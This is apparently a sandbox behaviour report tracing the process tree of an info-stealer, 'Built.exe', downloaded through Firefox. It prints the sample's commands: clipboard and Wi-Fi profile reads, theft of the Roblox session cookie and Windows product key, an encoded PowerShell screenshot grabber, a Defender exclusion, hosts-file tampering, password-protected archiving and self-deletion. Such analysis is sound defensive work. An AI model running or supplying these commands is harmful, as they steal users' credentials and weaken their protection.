    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:6120
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2004
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3664
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3852
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:6100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:860
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p45jccep\p45jccep.cmdline"
        5⤵
        
        PID:1452
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E69.tmp" "c:\Users\Admin\AppData\Local\Temp\p45jccep\CSCA0CBEE2651AA4915A95D383076AFF1A3.TMP"
        6⤵
        
        PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2632
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5240
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3724
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4572
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6000
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1628
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5920
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4480
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\fniok.zip" *"
    3⤵
    PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI60242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\fniok.zip" *
      4⤵
      Executes dropped EXE
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1764
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4280

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4940
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1888 -prefsLen 23839 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f72636f8-ca03-494e-9ac5-7432a079157f} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" gpu
    3⤵
    PID:5128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {654313d7-919d-4b29-ab5f-78c7d0ba3a75} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" socket
    3⤵
    PID:5360
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2856 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 3200 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d3acd6a-c0d1-49a3-9435-f9a64752179c} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:5292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3704 -childID 2 -isForBrowser -prefsHandle 3652 -prefMapHandle 2776 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d5c637d-f983-4b7e-8bf9-627e7373a5d4} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:5376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4896 -prefMapHandle 4892 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf2317bb-0713-446a-8dde-2eb625949ad9} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" utility
    3⤵
    - Checks processor information in registry
    PID:3660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5392 -prefMapHandle 5400 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34c8203-994b-4046-8f2b-bc870376b06a} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:2804
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 4 -isForBrowser -prefsHandle 5616 -prefMapHandle 5612 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3529c85b-fe21-48e9-bf54-c9e548f9dacd} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:5224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 5 -isForBrowser -prefsHandle 5812 -prefMapHandle 5808 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de6f3459-c45f-40e1-bbc2-d48fe08453c5} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:4556
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 6 -isForBrowser -prefsHandle 6040 -prefMapHandle 6036 -prefsLen 29279 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5614cd5-0d8c-4327-ac6a-9b4b6a1f352c} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:4628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3948 -childID 7 -isForBrowser -prefsHandle 6472 -prefMapHandle 3956 -prefsLen 27777 -prefMapSize 244658 -jsInitHandle 1332 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc0d50f2-5aa7-45e2-9b05-fe5443ffc780} 4352 "\\.\pipe\gecko-crash-server-pipe.4352" tab
    3⤵
    PID:4388
- - C:\Users\Admin\Downloads\Built.exe
    "C:\Users\Admin\Downloads\Built.exe"
    3⤵
    - Executes dropped EXE
    PID:5456
  - - C:\Users\Admin\Downloads\Built.exe
      "C:\Users\Admin\Downloads\Built.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      PID:4836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'"
        5⤵
        
        PID:4764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2112
    - - C:\Windows\system32\cmd.exe
        
